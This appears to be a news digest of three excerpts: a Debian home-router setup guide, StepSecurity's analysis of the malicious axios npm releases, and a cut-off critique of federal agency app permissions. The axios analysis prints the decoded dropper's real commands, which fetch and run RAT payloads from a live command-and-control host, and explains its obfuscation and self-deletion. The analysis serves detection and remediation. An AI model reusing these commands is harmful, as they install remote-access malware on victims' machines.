I don’t like to cover “current events” very much, but the American government just revealed a truly bewildering policy effectively banning import of new consumer router models. This is ridiculous for many reasons, but if this does indeed come to pass it may be beneficial to learn how to “homebrew” a router.
Fortunately, you can make a router out of basically anything resembling a computer.
I’ve used a linux powered mini-pc as my own router for many years, and have posted a few times before about how to make linux routers and firewalls in that time. It’s been rock solid stable, and the only issue I’ve had over the years was wearing out a $20 mSATA drive. While I use Debian typically, Alpine linux probably works just as well, perhaps better if you’re familiar with it. As long as the device runs Linux well and has a couple USB ports, you’re good to go. Mini-PCs, desktop PCs, SBCs, rackmount servers, old laptops, or purpose built devices will all work.
To be clear, this is not meant to be a practical “solution” to the US policy, it’s to show people a neat “hack” you can do to squeeze more capability out of hardware you might already own, and to demonstrate that there’s nothing special about routers - They’re all just computers after all.
My personal preference is a purpose-made mini PC with a passively cooled design.
However, basically anything will work. It should have two Ethernet interfaces, but a standard USB-Ethernet dongle will also do the trick. It won’t be as reliable as an onboard interface, but will probably be good enough. For example, this janky pile of spare parts can easily push 820-850mbps on the wired LAN and ~300 mbps on the wireless network:
This particular device is a Celeron 3205U dual core running at a blistering 1.5 GHz. Even that measly chip is more than capable of routing an entire house or small business worth of traffic.
Going back even further, this was my setup for the first couple weeks of the fall 2016 semester:
It might be hard to tell what’s going on here by looking, so let me break it down:
* An ExpressCard-PCIe bridge in the ThinkPad’s expansion bay
* A trash-picked no-name Ethernet card in the PCIe slot, missing its mounting bracket
* An ancient Cisco 2960 100 mbit switch, purchased for $10 from my college
* A D-Link router acting as an access point (“as-is” thrift store find with a bad WAN port)
Yes, this is indeed a router! It probably looks like a pile of junk, because it is, but it’s junk that’s perfectly able to perform the job I gave it!
When set up, the system will be configured like this:
Both LAN interfaces will be bridged together, meaning that devices on the wired and wireless networks will be able to communicate normally. If one LAN port isn’t enough, you can plug in as many USB Ethernet dongles as you need and bridge ’em all together. It won’t be quite as fast as a “real” switch, but if you’re looking for performance you might’ve come to the wrong place today.
As mentioned before, this will run Debian as the operating system, and uses very few pieces that don’t come with the base install:
* Any firmware blobs not in the default install
Also, I should mention that I’ll only be setting up IPv4 here. IPv6 works great for stuff like mobile devices, but I still find it too frustrating inside a LAN. Perhaps my brain is too calcified already, but I’ll happily hold out on IPv4 for now.
* If you can, set the device to the lowest clock speed, but disable any power management for USB or PCI devices.
* Find the option like “Restore after AC Power Loss” and turn it ON.
* Some devices won’t properly power up if there’s no display connected. If your device is like this, stick a “dummy dongle” into the HDMI port.
* Lots of hardware will only work correctly with the non-free-firmware repository enabled
Depending on your wireless hardware, you may need to install an additional firmware package.
sudo apt install firmware-iwlwifi    # Intel wireless cards
sudo apt install firmware-ath9k-htc  # Atheros USB adapters
Or if you have something truly ancient like I do:
sudo apt install firmware-atheros
After the initial install is done, there are some additional utilities to install:
sudo apt install bridge-utils hostapd dnsmasq
In terms of software, that’s about all that’s needed. There should be about 250 packages on the system in total.
In modern Linux systems, network interfaces are named based on their physical location and driver, like enp0s31f6. I find the old format, like ethX, much simpler, so each interface gets a persistent name.
For each network interface, create a file at /etc/systemd/network/10-persistent-ethX.link
[Match]
MACAddress=AA:BB:CC:DD:00:11
[Link]
Name=ethX
This uses a USB Wi-Fi dongle to act as an access point, creating a network for other devices to join. This will not work as well as a purpose built device, but it’s better than nothing. I’ve had reasonably good results with this, but I also live in a very small building where I’m rarely more than 10m away from the router. If you rely heavily on your wireless network working properly, try to find a dedicated access point device. An old router, even from over a decade ago, will probably work fine for this by just connecting to its LAN port (not the WAN port!).
To set up the onboard wi-fi network, create a config file at /etc/hostapd/hostapd.conf
interface=wlan0
bridge=br0
hw_mode=g
channel=11
ieee80211d=1
country_code=US
ieee80211n=1
wmm_enabled=1
ssid=My Cool and Creative Wi-Fi Name
auth_algs=1
wpa=2
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
wpa_passphrase=mysecurepassword
By default the hostapd service is masked and can’t be started, so we unmask it before enabling the service.
sudo systemctl unmask hostapd
sudo systemctl enable --now hostapd
The “outside” interface will be the WAN, and the “inside” will be the LAN. Note that the LAN interface does not get a default gateway.
allow-hotplug eth0
allow-hotplug eth1
auto wlan0
auto br0
iface eth0 inet dhcp
iface br0 inet static
bridge_ports eth1 wlan0
address 192.168.1.1/24
After this step, give the device a quick reboot. It should come back up cleanly. If it doesn’t, confirm that the previous steps were done correctly, and check for errors by running journalctl -e -u networking.service
If it all worked correctly, the output of this command should look like this:
$ sudo brctl show br0
bridge name bridge id STP enabled interfaces
br0 8000.xxxxx no eth1
wlan0
Create /etc/sysctl.d/10-forward.conf and add this line to enable IP forwarding:
net.ipv4.ip_forward=1
sudo systemctl restart systemd-sysctl.service
The firewall rules and NAT configuration are both handled by the new netfilter system in Linux. We manage this using nftables.
#!/usr/sbin/nft -f

flush ruleset

table inet filter {
    chain input {
        type filter hook input priority 0; policy drop;
        ct state { established, related } counter accept
        ip protocol icmp counter accept
        iifname "br0" tcp dport { 22, 53 } counter accept
        iifname "br0" udp dport { 53, 67, 68 } counter accept
        counter
    }
    chain forward {
        type filter hook forward priority 0; policy drop;
        iifname "eth0" oifname "br0" ct state { established, related } counter accept
        iifname "br0" oifname "eth0" ct state { new, established, related } counter accept
        counter
    }
    chain output {
        type filter hook output priority 0; policy accept;
        counter
    }
}

table ip nat {
    chain postrouting {
        type nat hook postrouting priority 100; policy accept;
        oifname "eth0" counter masquerade
    }
}
This performs NAT, denies all inbound traffic from outside the network, and allows the router device to act as a DNS, DHCP, and SSH server (for management). Pretty much a bog standard firewall config.
Enable this for the next boot:
sudo systemctl enable nftables.service
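One package installed earlier that hasn’t been configured yet is dnsmasq, which provides DHCP and DNS for the LAN. A minimal sketch of /etc/dnsmasq.conf matching the 192.168.1.1/24 bridge above — the address range and lease time here are arbitrary example choices, not from the original setup:

```
# Only serve the LAN bridge, never the WAN interface
interface=br0
bind-interfaces

# Hand out addresses on the bridge's subnet
dhcp-range=192.168.1.50,192.168.1.150,12h

# Advertise this box as the default gateway and DNS server
dhcp-option=option:router,192.168.1.1
dhcp-option=option:dns-server,192.168.1.1
```

Restart with sudo systemctl restart dnsmasq to pick up the config.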
...
Read the original on nbailey.ca »
Hijacked maintainer account used to publish poisoned axios releases including 1.14.1 and 0.30.4. The attacker injected a hidden dependency that drops a cross platform RAT. We are actively investigating and will update this post with a full technical analysis. StepSecurity is hosting a community town hall on this incident on April 1st at 10:00 AM PT.

On March 31, 2026, StepSecurity identified two malicious versions of the widely used axios HTTP client library published to npm: axios@1.14.1 and axios@0.30.4. Both versions were published using the compromised npm credentials of a lead axios maintainer, bypassing the project’s normal GitHub Actions CI/CD pipeline. The attacker changed the maintainer’s account email to an anonymous ProtonMail address and manually published the poisoned packages via the npm CLI.

The malicious versions inject a new dependency, plain-crypto-js@4.2.1, which is never imported anywhere in the axios source code. Its sole purpose is to execute a postinstall script that acts as a cross platform remote access trojan (RAT) dropper, targeting macOS, Windows, and Linux. The dropper contacts a live command and control server and delivers platform specific second stage payloads. After execution, the malware deletes itself and replaces its own package.json with a clean version to evade forensic detection.

This was not opportunistic. The malicious dependency was staged 18 hours in advance. Three separate payloads were pre-built for three operating systems. Both release branches were hit within 39 minutes. Every trace was designed to self-destruct. This is among the most operationally sophisticated supply chain attacks ever documented against a top-10 npm package. Neither malicious version contains a single line of malicious code inside axios itself.
Instead, both inject a fake dependency, plain-crypto-js@4.2.1, a package that is never imported anywhere in the axios source, whose only purpose is to run a postinstall script that deploys a cross-platform remote access trojan (RAT). The dropper contacts a live command-and-control server, delivers separate second-stage payloads for macOS, Windows, and Linux, then erases itself and replaces its own package.json with a clean decoy, leaving a developer who inspects their node_modules folder after the fact with no indication anything went wrong.

If you have installed axios@1.14.1 or axios@0.30.4, assume your system is compromised.

These compromises were detected by StepSecurity AI Package Analyst [1][2] and StepSecurity Harden-Runner. We have responsibly disclosed the issue to the project maintainers. StepSecurity Harden-Runner, whose community tier is free for public repos and is used by over 12,000 public repositories, detected the compromised axios package making anomalous outbound connections to the attacker’s C2 domain across multiple open source projects. For example, Harden-Runner flagged the C2 callback to sfrclak.com:8000 during a routine CI run in the backstage repository, one of the most widely used developer portal frameworks. The connection was automatically marked as anomalous because it had never appeared in any prior workflow run. Harden-Runner insights for community tier projects are public by design, allowing anyone to verify the detection: https://app.stepsecurity.io/github/backstage/backstage/actions/runs/23775668703?tab=network-events

The attack was pre-staged across roughly 18 hours, with the malicious dependency seeded on npm before the axios releases to avoid “brand-new package” alarms from security scanners:
plain-crypto-js@4.2.0 published by nrwise@proton.me — a clean decoy containing a full copy of the legitimate crypto-js source, no postinstall hook. Its sole purpose is to establish npm publishing history so the package does not appear as a zero-history account during later inspection.
plain-crypto-js@4.2.1 published by nrwise@proton.me — malicious payload added. The postinstall: “node setup.js” hook and obfuscated dropper are introduced.
axios@1.14.1 published by compromised jasonsaayman account (email: ifstap@proton.me) — injects plain-crypto-js@4.2.1 as a runtime dependency, targeting the modern 1.x user base.
axios@0.30.4 published by the same compromised account — identical injection into the legacy 0.x branch, published 39 minutes later to maximize coverage across both release lines.
npm unpublishes axios@1.14.1 and axios@0.30.4. Both versions are removed from the registry and the latest dist-tag reverts to 1.14.0. axios@1.14.1 had been live for approximately 2 hours 53 minutes; axios@0.30.4 for approximately 2 hours 15 minutes. Timestamp is inferred from the axios registry document’s modified field (03:15:30Z) — npm does not expose a dedicated per-version unpublish timestamp in its public API.
npm initiates a security hold on plain-crypto-js, beginning the process of replacing the malicious package with an npm security-holder stub.
npm publishes the security-holder stub plain-crypto-js@0.0.1-security.0 under the npm@npmjs.com account, formally replacing the malicious package on the registry. plain-crypto-js@4.2.1 had been live for approximately 4 hours 27 minutes. Attempting to install any version of plain-crypto-js now returns the security notice.
axios is the most popular HTTP client library in the JavaScript ecosystem. It is used in virtually every Node.js and browser application that makes HTTP requests — from React front-ends to CI/CD tooling to server-side APIs. With over 300 million weekly downloads, a compromise of even a single minor release has an enormous potential blast radius. A developer running a routine npm install or npm update would have no reason to suspect the package was deploying malware.

The attacker compromised the jasonsaayman npm account, the primary maintainer of the axios project. The account’s registered email was changed to ifstap@proton.me — an attacker-controlled ProtonMail address. Using this access, the attacker published malicious builds across both the 1.x and 0.x release branches simultaneously, maximizing the number of projects exposed. Both axios@1.14.1 and axios@0.30.4 are recorded in the npm registry as published by jasonsaayman, making them indistinguishable from legitimate releases at a glance.

A critical forensic signal is visible in the npm registry metadata. Every legitimate axios 1.x release is published via GitHub Actions with npm’s OIDC Trusted Publisher mechanism, meaning the publish is cryptographically tied to a verified GitHub Actions workflow. axios@1.14.1 breaks that pattern entirely — published manually via a stolen npm access token with no OIDC binding and no gitHead:

// axios@1.14.0 — LEGITIMATE
"_npmUser": {
"name": "GitHub Actions",
"email": "npm-oidc-no-reply@github.com",
"trustedPublisher": {
"id": "github",
"oidcConfigId": "oidc:9061ef30-3132-49f4-b28c-9338d192a1a9"

// axios@1.14.1 — MALICIOUS
"_npmUser": {
"name": "jasonsaayman",
"email": "ifstap@proton.me"
// no trustedPublisher, no gitHead, no corresponding GitHub commit or tag
}

There is no commit or tag in the axios GitHub repository that corresponds to 1.14.1. The release exists only on npm. The OIDC token that legitimate releases use is ephemeral and scoped to the specific workflow — it cannot be stolen. The attacker must have obtained a long-lived classic npm access token for the account.

Before publishing the backdoored axios releases, the attacker pre-staged a malicious package on npm: plain-crypto-js@4.2.1, published from a separate throwaway account (nrwise, nrwise@proton.me). Note the shared use of ProtonMail across both accounts — a consistent operational pattern for this actor. This package is deliberately designed to look legitimate:

* Masquerades as crypto-js — the same description (“JavaScript library of crypto standards”), the same author attribution (Evan Vosberg), and the same repository URL pointing to github.com/brix/crypto-js
* Contains a postinstall hook: "postinstall": "node setup.js" — executes automatically, without any user action, on every npm install
* Pre-stages its own evidence destruction — includes a file called package.md, a clean package.json stub (version 4.2.0, no postinstall) ready to overwrite the real manifest after the attack runs

The attacker published axios@1.14.1 and axios@0.30.4 with plain-crypto-js: "^4.2.1" added as a runtime dependency — a package that has never appeared in any legitimate axios release. The diff is surgical: every other dependency is identical to the prior clean version.

When a developer runs npm install axios@1.14.1, npm resolves the dependency tree and installs plain-crypto-js@4.2.1 automatically. npm then executes plain-crypto-js’s postinstall script, launching the dropper.

Phantom dependency: A grep across all 86 files in axios@1.14.1 confirms that plain-crypto-js is never imported or require()’d anywhere in the axios source code. It is added to package.json only to trigger the postinstall hook.
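That kind of phantom-dependency check is easy to automate for your own projects. A minimal sketch in Python — this is a hypothetical helper written for illustration, not StepSecurity or npm tooling:

```python
import json
import os
import re

def phantom_dependencies(pkg_dir: str) -> set[str]:
    """Return dependencies declared in package.json but never imported in the source."""
    with open(os.path.join(pkg_dir, "package.json")) as f:
        declared = set(json.load(f).get("dependencies", {}))
    used = set()
    for root, _, files in os.walk(pkg_dir):
        for name in files:
            # Only scan JavaScript/TypeScript source files
            if not name.endswith((".js", ".cjs", ".mjs", ".ts")):
                continue
            with open(os.path.join(root, name), encoding="utf-8", errors="ignore") as src:
                text = src.read()
            for dep in declared:
                # Matches require('dep'), require("dep/sub"), import ... from 'dep'
                if re.search(r"['\"]" + re.escape(dep) + r"(/[^'\"]*)?['\"]", text):
                    used.add(dep)
    return declared - used
```

Run against an installed copy of a package, any name it returns is a declared dependency with zero usage in the code — exactly the signal described above.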
A dependency that appears in the manifest but has zero usage in the codebase is a high-confidence indicator of a compromised release.

setup.js is a single minified file employing a two-layer obfuscation scheme designed to evade static analysis tools and confuse human reviewers. All sensitive strings — module names, OS identifiers, shell commands, the C2 URL, and file paths — are stored as encoded values in an array named stq[]. Two functions decode them at runtime:

_trans_1(x, r) — XOR cipher. The key "OrDeR_7077" is parsed through JavaScript’s Number(): alphabetic characters produce NaN, which in bitwise operations becomes 0. Only the digits 7, 0, 7, 7 in positions 6–9 survive, giving an effective key of [0,0,0,0,0,0,7,0,7,7]. Each character at position r is decoded as: charCode XOR key[(7 × r × r) % 10] XOR 333

_trans_2(x, r) — Outer layer. Reverses the encoded string, replaces _ with =, base64-decodes the result (interpreting the bytes as UTF-8 to recover Unicode code points), then passes the output through _trans_1.

The dropper’s entry point is _entry("6202033"), where 6202033 is the C2 URL path segment. The full C2 URL is: http://sfrclak.com:8000/6202033

StepSecurity fully decoded every entry in the stq[] array. The recovered plaintext reveals the complete attack:

stq[0] → "child_process" // shell execution
stq[1] → "os" // platform detection
stq[2] → "fs" // filesystem operations
stq[3] → "http://sfrclak.com:8000/" // C2 base URL
stq[5] → "win32" // Windows platform identifier
stq[6] → "darwin" // macOS platform identifier
stq[12] → "curl -o /tmp/ld.py -d packages.npm.org/product2 -s SCR_LINK && nohup python3 /tmp/ld.py SCR_LINK > /dev/null 2>&1 &"
stq[13] → "package.json" // deleted after execution
stq[14] → "package.md" // clean stub renamed to package.json
stq[15] → ".exe"
stq[16] → ".ps1"
stq[17] → ".vbs"

The dropper checks os.platform() and branches into one of three attack paths.

On macOS (darwin), the dropper writes an AppleScript file to the system temp directory and executes it silently with nohup osascript. The AppleScript contacts the C2 server with POST body packages.npm.org/product0, downloads the macOS RAT binary, saves it to /Library/Caches/com.apple.act.mond (a path designed to look like a legitimate Apple system cache entry), makes it executable with chmod 770, and launches it in the background via /bin/zsh:

do shell script "curl -o /Library/Caches/com.apple.act.mond \
  -d packages.npm.org/product0 \
  -s http://sfrclak.com:8000/6202033 \
  && chmod 770 /Library/Caches/com.apple.act.mond \
  && /bin/zsh -c "/Library/Caches/com.apple.act.mond hhttp://sfrclak.com:8000/6202033 &" \
  &> /dev/null"

The AppleScript file is deleted after execution. The only persistent artifact is /Library/Caches/com.apple.act.mond. The path is deliberate: /Library/Caches/ is a system-owned directory rarely inspected during incident response, and the name com.apple.act.mond mimics Apple’s reverse-DNS daemon naming convention — the suffix likely abbreviates “Activity Monitor Daemon” to blend in with legitimate Apple background processes in the same directory.

On Windows (win32), the attack chain involves three stages:

* Run where powershell to locate the PowerShell binary path
* Copy the PowerShell binary to %PROGRAMDATA%\wt.exe — disguised as the Windows Terminal executable, providing a persistent copy of the interpreter
* Write a VBScript (.vbs) to the temp directory and execute it via cscript //nologo

Set objShell = CreateObject("WScript.Shell")
objShell.Run "cmd.exe /c curl -s -X POST " & _
  "-d ""packages.npm.org/product1"" " & _
  """http://sfrclak.com:8000/6202033"" > ""

The C2 returns a PowerShell RAT script, saved to %TEMP%\6202033.ps1 (using the campaign ID as filename). It runs with -ExecutionPolicy Bypass and -WindowStyle Hidden, then self-deletes. The VBScript (%TEMP%\6202033.vbs) is also deleted by cscript after execution. The only persistent artifact is %PROGRAMDATA%\wt.exe.

On all other platforms (Linux, etc.), the dropper executes a direct shell command via Node.js’s execSync:

curl -o /tmp/ld.py \
-d packages.npm.org/product2 \
-s http://sfrclak.com:8000/6202033 \
&& nohup python3 /tmp/ld.py http://sfrclak.com:8000/6202033 > /dev/null 2>&1 &

The C2 returns a Python RAT script. It is saved to /tmp/ld.py and executed in the background with nohup. The file remains on disk at /tmp/ld.py.

Three products, one C2: Each platform sends a distinct POST body to the same C2 URL — packages.npm.org/product0 (macOS), packages.npm.org/product1 (Windows), packages.npm.org/product2 (Linux). This allows the C2 server to serve a platform-appropriate payload in response to a single endpoint. The packages.npm.org/ prefix in the POST body is a deliberate attempt to make outbound traffic appear as benign npm registry communication in network logs and SIEM rules at a glance.

After launching the platform payload, setup.js performs three forensic cleanup steps that make standard post-infection analysis unreliable:

* Deletes itself — fs.unlink(__filename) removes setup.js from the installed package directory
* Deletes package.json — removes the file that contains the incriminating "postinstall": "node setup.js" hook
* Renames package.md to package.json — the pre-staged clean stub (version 4.2.0, no postinstall, no setup.js reference) is moved into place

Any post-infection inspection of node_modules/plain-crypto-js/package.json will show a completely clean manifest. There is no postinstall script, no setup.js file, and no indication that anything malicious was ever installed. Running npm audit or manually reviewing the installed package directory will not reveal the compromise.

Why the directory presence still matters: Even after cleanup, the existence of node_modules/plain-crypto-js/ is sufficient evidence of compromise — this package is not a dependency of any legitimate axios version. If you find this directory, the dropper ran.

Static analysis of the obfuscated dropper told us what the malware intended to do.
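As an aside on that static analysis: the _trans_1 XOR layer described earlier is simple enough to reimplement. A sketch in Python, based purely on the description above (XOR is its own inverse, so the same function both encodes and decodes):

```python
def derive_key(key_str: str) -> list[int]:
    # Mimic JavaScript's per-character Number(): non-digits become NaN,
    # which bitwise operations coerce to 0, so only digits survive.
    return [int(c) if c.isdigit() else 0 for c in key_str]

def trans_1(s: str, key: list[int]) -> str:
    # Per-character XOR: charCode ^ key[(7 * r * r) % 10] ^ 333
    return "".join(chr(ord(c) ^ key[(7 * r * r) % 10] ^ 333) for r, c in enumerate(s))

key = derive_key("OrDeR_7077")  # effective key: [0,0,0,0,0,0,7,0,7,7]
encoded = trans_1("child_process", key)
decoded = trans_1(encoded, key)  # round-trips back to "child_process"
```

The mostly-zero key means most positions are only XORed with the constant 333 — weak obfuscation by design, intended to defeat string scanners rather than cryptanalysis.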
To confirm it actually executes as designed, we installed axios@1.14.1 inside a GitHub Actions runner instrumented with StepSecurity Harden-Runner in audit mode. Harden-Runner captures every outbound network connection, every spawned process, and every file write at the kernel level — without interfering with execution in audit mode, giving us a complete ground-truth picture of what happens the moment npm install runs.The full Harden-Runner insights for this run are publicly accessible:
app.stepsecurity.io/github/actions-security-demo/compromised-packages/actions/runs/23776116077

The network event log contains two outbound connections to sfrclak.com:8000 — but what makes this particularly significant is when they occur:

The first C2 connection (curl, PID 2401) fires 1.1 seconds into the npm install — at 01:30:51Z, just 2 seconds after npm install began at 01:30:49Z. The postinstall hook triggered, decoded its strings, and was making an outbound HTTP connection to an external server before npm had finished resolving all dependencies.

The second C2 connection (nohup, PID 2400) occurs 36 seconds later, in an entirely different workflow step — “Verify axios import and version.” The npm install step was long finished. The malware had persisted into subsequent steps, running as a detached background process. This is the stage-2 Python payload (/tmp/ld.py) making a callback — alive and independent of the process that spawned it.

Why both connections show calledBy: "infra": When Harden-Runner can trace a network call to a specific Actions step through the runner process tree, it labels it "runner". The "infra" label means the process making the connection could not be attributed to a specific step — because the dropper used nohup … & to detach from the process tree. The process was deliberately orphaned to PID 1 (init), severing all parent-child relationships. This is the malware actively evading process attribution.

Process Tree: The Full Kill Chain as Observed at Runtime

Harden-Runner captures every execve syscall. The raw process events reconstruct the exact execution chain from npm install to C2 contact:

PID 2366 bash /home/runner/work/_temp/***.sh [01:30:48.186Z]
└─ PID 2380 env node npm install axios@1.14.1 [01:30:49.603Z]
└─ PID 2391 sh -c "node setup.js" [01:30:50.954Z]
│ cwd: node_modules/plain-crypto-js ← postinstall hook fires
└─ PID 2392 node setup.js [01:30:50.955Z]
│ cwd: node_modules/plain-crypto-js
└─ PID 2399 /bin/sh -c "curl -o /tmp/ld.py \ [01:30:50.978Z]
-d packages.npm.org/product2 \
-s http://sfrclak.com:8000/6202033 \
&& nohup python3 /tmp/ld.py \
http://sfrclak.com:8000/6202033 \
> /dev/null 2>&1 &"
PID 2401 curl -o /tmp/ld.py -d packages.npm.org/product2 [01:30:50.979Z]
ppid: 2400 ← child of nohup
PID 2400 nohup python3 /tmp/ld.py http://sfrclak.com:8000/6202033 [01:31:27.732Z]
ppid: 1 ← ORPHANED TO INIT — detached from npm process tree

The process tree confirms the exact execution chain decoded statically from setup.js. Four levels of process indirection separate the original npm install from the C2 callback: npm → sh → node → sh → curl/nohup. The nohup process (PID 2400) reporting ppid: 1 is the technical confirmation of the daemonization technique — by the time npm install returned successfully, a detached process was already running /tmp/ld.py in the background.

The file event log captures every file write by PID. The plain-crypto-js/package.json entry shows two writes from two different processes — directly confirming the anti-forensics technique described in static analysis:

File: node_modules/plain-crypto-js/package.json
Write 1 — pid=2380 (npm install) ts=01:30:50.905Z
Malicious package.json written to disk during install.
Contains: { "postinstall": "node setup.js" }
Write 2 — pid=2392 (node setup.js) ts=01:31:27.736Z [+36s]
Dropper overwrites package.json with clean stub from package.md.
Contains: version 4.2.0 manifest, no scripts, no postinstall.The 36-second gap between the two writes is the execution time of the dropper — it wrote the second file only after successfully launching the background payload. Harden-Runner flagged this as a “Source Code Overwritten” file integrity event. Post-infection, any tool that reads node_modules/plain-crypto-js/package.json will see the clean manifest. The write event log is the only runtime artifact that proves the swap occurred.
Check for the malicious axios versions in your project:

npm list axios 2>/dev/null | grep -E "1\.14\.1|0\.30\.4"
grep -A1 '"axios"' package-lock.json | grep -E "1\.14\.1|0\.30\.4"

ls node_modules/plain-crypto-js 2>/dev/null && echo "POTENTIALLY AFFECTED"

If setup.js already ran, package.json inside this directory will have been replaced with a clean stub. The presence of the directory is sufficient evidence the dropper executed.

# macOS
ls -la /Library/Caches/com.apple.act.mond 2>/dev/null && echo "COMPROMISED"

# Linux
ls -la /tmp/ld.py 2>/dev/null && echo "COMPROMISED"

# Windows (cmd.exe)
dir "%PROGRAMDATA%\wt.exe" 2>nul && echo COMPROMISED

Check CI/CD pipeline logs for any npm install executions that may have pulled axios@1.14.1 or axios@0.30.4. Any pipeline that installed either version should be treated as compromised and all injected secrets rotated immediately.

Downgrade axios to a clean version and pin it:

npm install axios@1.14.0   # for 1.x users
npm install axios@0.30.3   # for 0.x users
Add an overrides block to prevent transitive resolution back to the malicious versions:

{
  "dependencies": { "axios": "1.14.0" },
  "overrides": { "axios": "1.14.0" },
  "resolutions": { "axios": "1.14.0" }
}

If a RAT artifact is found: treat the system as fully compromised. Do not attempt to clean in place — rebuild from a known-good state. Rotate all credentials on any system where the malicious package ran: npm tokens, AWS access keys, SSH private keys, cloud credentials (GCP, Azure), CI/CD secrets, and any values present in .env files accessible at install time. Audit CI/CD pipelines for runs that installed the affected versions. Any workflow that executed npm install with these versions should have all injected secrets rotated.

Use --ignore-scripts in CI/CD as a standing policy to prevent postinstall hooks from running during automated builds:

npm ci --ignore-scripts

Block C2 traffic at the network/DNS layer as a precaution on any potentially exposed system:

# Block via firewall (Linux)
iptables -A OUTPUT -d 142.11.206.73 -j DROP

# Block via /etc/hosts (macOS/Linux)
echo "0.0.0.0 sfrclak.com" >> /etc/hosts

StepSecurity Harden-Runner enforces a network egress allowlist in GitHub Actions, restricting outbound network traffic to only allowed endpoints. Both DNS and network-level enforcement prevent covert data exfiltration. The C2 callback to sfrclak.com:8000 and the payload fetch in the postinstall script would have been blocked at the network level before the RAT could be delivered. Harden-Runner also automatically logs outbound network traffic per job and repository, establishing normal behavior patterns and flagging anomalies. This reveals whether malicious postinstall scripts executed exfiltration attempts or contacted suspicious domains, even when the malware self-deletes its own evidence afterward. The C2 callback to sfrclak.com:8000 was flagged as anomalous because it had never appeared in any prior workflow run.

Supply chain attacks like this one do not stop at the CI/CD pipeline. The malicious postinstall script in plain-crypto-js@4.2.1 drops a cross-platform RAT designed to run on the developer’s own machine, harvesting credentials, SSH keys, cloud tokens, and other secrets from the local environment. Every developer who ran npm install with the compromised axios version outside of CI is a potential point of compromise. StepSecurity Dev Machine Guard gives security teams real-time visibility into npm packages installed across every enrolled developer device. When a malicious package is identified, teams can immediately search by package name and version to discover all impacted machines, as with axios@1.14.1 and axios@0.30.4.

Newly published npm packages are temporarily blocked during a configurable cooldown window. When a PR introduces or updates to a recently published version, the check automatically fails. Since most malicious packages are identified within 24 hours, this creates a crucial safety buffer.
In this case, plain-crypto-js@4.2.1 was published hours before the axios releases, so any PR updating to axios@1.14.1 or axios@0.30.4 during the cooldown period would have been blocked automatically.

StepSecurity maintains a real-time database of known malicious and high-risk npm packages, updated continuously, often before official CVEs are filed. If a PR attempts to introduce a compromised package, the check fails and the merge is blocked. Both axios@1.14.1 and plain-crypto-js@4.2.1 were added to this database within minutes of detection.

Search across all PRs in all repositories across your organization to find where a specific package was introduced. When a compromised package is discovered, instantly understand the blast radius: which repos, which PRs, and which teams are affected. This works across pull requests, default branches, and dev machines.

AI Package Analyst continuously monitors the npm registry for suspicious releases in real time, scoring packages for supply chain risk before you install them. In this case, both axios@1.14.1 and plain-crypto-js@4.2.1 were flagged within minutes of publication, giving teams time to investigate, confirm malicious intent, and act before the packages accumulated significant installs. Alerts include the full behavioral analysis, decoded payload details, and direct links to the OSS Security Feed.

StepSecurity has published a threat intel alert in the Threat Center with all relevant links to check if your organization is affected. The alert includes the full attack summary, technical analysis, IOCs, affected versions, and remediation steps, so teams have everything needed to triage and respond immediately. Threat Center alerts are delivered directly into existing SIEM workflows for real-time visibility.

We want to thank the axios maintainers and the community members who quickly identified and triaged the compromise in GitHub issue #10604.
Their rapid response, collaborative analysis, and clear communication helped the ecosystem understand the threat and take action within hours.

We also want to thank GitHub for swiftly suspending the compromised account and npm for quickly unpublishing the malicious axios versions and placing a security hold on plain-crypto-js. The coordinated response across maintainers, GitHub, and npm significantly limited the window of exposure for developers worldwide.

In summary: a hijacked maintainer account was used to publish poisoned axios releases, including 1.14.1 and 0.30.4, and the attacker injected a hidden dependency that drops a cross-platform RAT. We are actively investigating and will update this post with a full technical analysis.
...
Read the original on www.stepsecurity.io »
The federal government released an app yesterday, March 27th, and it’s spyware.
The White House app markets itself as a way to get “unparalleled access” to the Trump administration, with press releases, livestreams, and policy updates. The kind of content that every RSS feed on the planet delivers with one permission: network access. But the White House app, version 47.0.1 (because subtlety died a long time ago), requests precise GPS location, biometric fingerprint access, storage modification, the ability to run at startup, draw over other apps, view your Wi-Fi connections, and read badge notifications. It also ships with 3 embedded trackers including Huawei Mobile Services Core (yes, the Chinese company the US government sanctioned, shipping tracking infrastructure inside the sitting president’s official app), and it has an ICE tip line button that redirects straight to ICE’s reporting page.
This thing also has a “Text the President” button that auto-fills your message with “Greatest President Ever!” and then collects your name and phone number. There’s no specific privacy policy for the app, just a generic whitehouse.gov policy that doesn’t address any of the app’s tracking capabilities.
The White House app might actually be one of the milder ones. I’ve been going through every federal agency app I can find on Google Play, pulling their permissions from Exodus Privacy (which audits Android APKs for trackers and permissions), and what I found deserves its own term. I’m calling it Fedware.
Ok so let me walk you through what the federal government is running on your phone.
The FBI’s app, myFBI Dashboard, requests 12 permissions including storage modification, Wi-Fi scanning, account discovery (it can see what accounts are on your device), phone state reading, and auto-start at boot. It also contains 4 trackers, one of which is Google AdMob, which means the FBI’s official app ships with an ad-serving SDK while also reading your phone identity. From what I found, the FBI’s news app has more trackers embedded than most weather apps.
The FEMA app requests 28 permissions including precise and approximate location, and has gone from 4 trackers in older versions down to 1 in v3.0.14. Twenty-eight permissions for an app whose primary function is showing you weather alerts and shelter locations. To put that in context, the AP News app delivers the same kind of disaster coverage with a fraction of the permissions.
IRS2Go has 3 trackers and 10 permissions in its latest version, and according to a TIGTA audit, the IRS released this app to the public before the required Privacy Impact Assessment was even signed, which violated OMB Circular A-130. The app shares device IDs, app activity, and crash logs with third parties, and TIGTA found that the IRS never confirmed that filing status and refund amounts were masked and encrypted in the app interface.
MyTSA comes in lighter with 9 permissions and 1 tracker, but still requests precise and approximate location. The TSA’s own Privacy Impact Assessment says the app stores location locally and claims it never transmits GPS data to TSA. I’ll give them credit for documenting that, because most of these apps have privacy policies that read like ransom notes.
CBP Mobile Passport Control is where things get genuinely alarming. This one requests 14 permissions including 7 classified as “dangerous”: background location tracking (it follows you even when the app is closed), camera access, biometric authentication, and full external storage read/write. And the whole CBP ecosystem, from CBP One to CBP Home to Mobile Passport Control, feeds data into a network that retains your faceprints for up to 75 years and shares it across DHS, ICE, and the FBI.
The government also built a facial recognition app called Mobile Fortify that ICE agents carry in the field. It draws from hundreds of millions of images across DHS, FBI, and State Department databases. ICE Homeland Security Investigations signed a $9.2 million contract with Clearview AI in September 2025, giving agents access to over 50 billion facial images scraped from the internet. DHS’s own internal documents admit Mobile Fortify can be used to amass biographical information of “individuals regardless of citizenship or immigration status”, and CBP confirmed it will “retain all photographs”, including those of U.S. citizens, for 15 years.
